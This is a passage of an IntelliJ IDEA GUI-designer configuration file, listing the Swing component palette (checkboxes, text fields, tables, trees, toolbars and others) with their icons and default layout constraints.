 29 |       <item class="javax.swing.JCheckBox" icon="/com/intellij/uiDesigner/icons/checkBox.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 30 |         <default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
 31 |         <initial-values>
 32 |           <property name="text" value="CheckBox" />
 33 |         </initial-values>
 34 |       </item>
 35 |       <item class="javax.swing.JLabel" icon="/com/intellij/uiDesigner/icons/label.svg" removable="false" auto-create-binding="false" can-attach-label="false">
 36 |         <default-constraints vsize-policy="0" hsize-policy="0" anchor="8" fill="0" />
 37 |         <initial-values>
 38 |           <property name="text" value="Label" />
 39 |         </initial-values>
 40 |       </item>
 41 |       <item class="javax.swing.JTextField" icon="/com/intellij/uiDesigner/icons/textField.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 42 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
 43 |           <preferred-size width="150" height="-1" />
 44 |         </default-constraints>
 45 |       </item>
 46 |       <item class="javax.swing.JPasswordField" icon="/com/intellij/uiDesigner/icons/passwordField.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 47 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
 48 |           <preferred-size width="150" height="-1" />
 49 |         </default-constraints>
 50 |       </item>
 51 |       <item class="javax.swing.JFormattedTextField" icon="/com/intellij/uiDesigner/icons/formattedTextField.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 52 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
 53 |           <preferred-size width="150" height="-1" />
 54 |         </default-constraints>
 55 |       </item>
 56 |       <item class="javax.swing.JTextArea" icon="/com/intellij/uiDesigner/icons/textArea.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 57 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 58 |           <preferred-size width="150" height="50" />
 59 |         </default-constraints>
 60 |       </item>
 61 |       <item class="javax.swing.JTextPane" icon="/com/intellij/uiDesigner/icons/textPane.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 62 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 63 |           <preferred-size width="150" height="50" />
 64 |         </default-constraints>
 65 |       </item>
 66 |       <item class="javax.swing.JEditorPane" icon="/com/intellij/uiDesigner/icons/editorPane.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 67 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 68 |           <preferred-size width="150" height="50" />
 69 |         </default-constraints>
 70 |       </item>
 71 |       <item class="javax.swing.JComboBox" icon="/com/intellij/uiDesigner/icons/comboBox.svg" removable="false" auto-create-binding="true" can-attach-label="true">
 72 |         <default-constraints vsize-policy="0" hsize-policy="2" anchor="8" fill="1" />
 73 |       </item>
 74 |       <item class="javax.swing.JTable" icon="/com/intellij/uiDesigner/icons/table.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 75 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 76 |           <preferred-size width="150" height="50" />
 77 |         </default-constraints>
 78 |       </item>
 79 |       <item class="javax.swing.JList" icon="/com/intellij/uiDesigner/icons/list.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 80 |         <default-constraints vsize-policy="6" hsize-policy="2" anchor="0" fill="3">
 81 |           <preferred-size width="150" height="50" />
 82 |         </default-constraints>
 83 |       </item>
 84 |       <item class="javax.swing.JTree" icon="/com/intellij/uiDesigner/icons/tree.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 85 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 86 |           <preferred-size width="150" height="50" />
 87 |         </default-constraints>
 88 |       </item>
 89 |       <item class="javax.swing.JTabbedPane" icon="/com/intellij/uiDesigner/icons/tabbedPane.svg" removable="false" auto-create-binding="true" can-attach-label="false">
 90 |         <default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
 91 |           <preferred-size width="200" height="200" />
 92 |         </default-constraints>
 93 |       </item>
 94 |       <item class="javax.swing.JSplitPane" icon="/com/intellij/uiDesigner/icons/splitPane.svg" removable="false" auto-create-binding="false" can-attach-label="false">
 95 |         <default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
 96 |           <preferred-size width="200" height="200" />
 97 |         </default-constraints>
 98 |       </item>
 99 |       <item class="javax.swing.JSpinner" icon="/com/intellij/uiDesigner/icons/spinner.svg" removable="false" auto-create-binding="true" can-attach-label="true">
100 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
101 |       </item>
102 |       <item class="javax.swing.JSlider" icon="/com/intellij/uiDesigner/icons/slider.svg" removable="false" auto-create-binding="true" can-attach-label="false">
103 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
104 |       </item>
105 |       <item class="javax.swing.JSeparator" icon="/com/intellij/uiDesigner/icons/separator.svg" removable="false" auto-create-binding="false" can-attach-label="false">
106 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3" />
107 |       </item>
108 |       <item class="javax.swing.JProgressBar" icon="/com/intellij/uiDesigner/icons/progressbar.svg" removable="false" auto-create-binding="true" can-attach-label="false">
109 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1" />
110 |       </item>
111 |       <item class="javax.swing.JToolBar" icon="/com/intellij/uiDesigner/icons/toolbar.svg" removable="false" auto-create-binding="false" can-attach-label="false">
112 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1">
113 |           <preferred-size width="-1" height="20" />
114 |         </default-constraints>
115 |       </item>
116 |       <item class="javax.swing.JToolBar$Separator" icon="/com/intellij/uiDesigner/icons/toolbarSeparator.svg" removable="false" auto-create-binding="false" can-attach-label="false">
117 |         <default-constraints vsize-policy="0" hsize-policy="0" anchor="0" fill="1" />
118 |       </item>
119 |       <item class="javax.swing.JScrollBar" icon="/com/intellij/uiDesigner/icons/scrollbar.svg" removable="false" auto-create-binding="true" can-attach-label="false">
120 |         <default-constraints vsize-policy="6" hsize-policy="0" anchor="0" fill="2" />
121 |       </item>
122 |     </group>
123 |   </component>
124 | </project>


--------------------------------------------------------------------------------